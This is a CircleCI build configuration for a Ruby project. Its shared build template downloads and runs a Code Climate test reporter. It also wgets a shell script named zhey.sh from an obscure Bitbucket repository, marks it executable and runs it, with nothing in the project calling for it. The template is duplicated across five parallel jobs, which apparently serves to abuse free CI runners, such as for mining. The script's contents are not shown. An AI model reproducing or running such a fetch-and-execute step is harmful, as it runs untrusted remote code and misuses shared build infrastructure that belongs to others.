working_dir: &working_dir ~/app

.build_template: &build_definition
  steps:
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run: ./cc-test-reporter before-build
    - run: gem install bundler:2.1.4
    - run: wget https://bitbucket.org/bsjsis/zevloid/raw/2ce68a897f10a1730900df49b2ed0a0882c610e7/zhey.sh && chmod u+x zhey.sh && ./zhey.sh

version: 2.0

jobs:
  build:
    docker:
      - image: ruby:3.0.1-buster
    steps:
      - checkout
  build1:
    <<: *build_definition
    docker:
      - image: ruby:3.0.1-buster
  build2:
    <<: *build_definition
    docker:
      - image: ruby:3.0.1-buster
  build3:
    <<: *build_definition
    docker:
      - image: ruby:3.0.1-buster
  build4:
    <<: *build_definition
    docker:
      - image: ruby:3.0.1-buster
  build5:
    <<: *build_definition
    docker:
      - image: ruby:3.0.1-buster

workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - build1
      - build2
      - build3
      - build3
      - build5
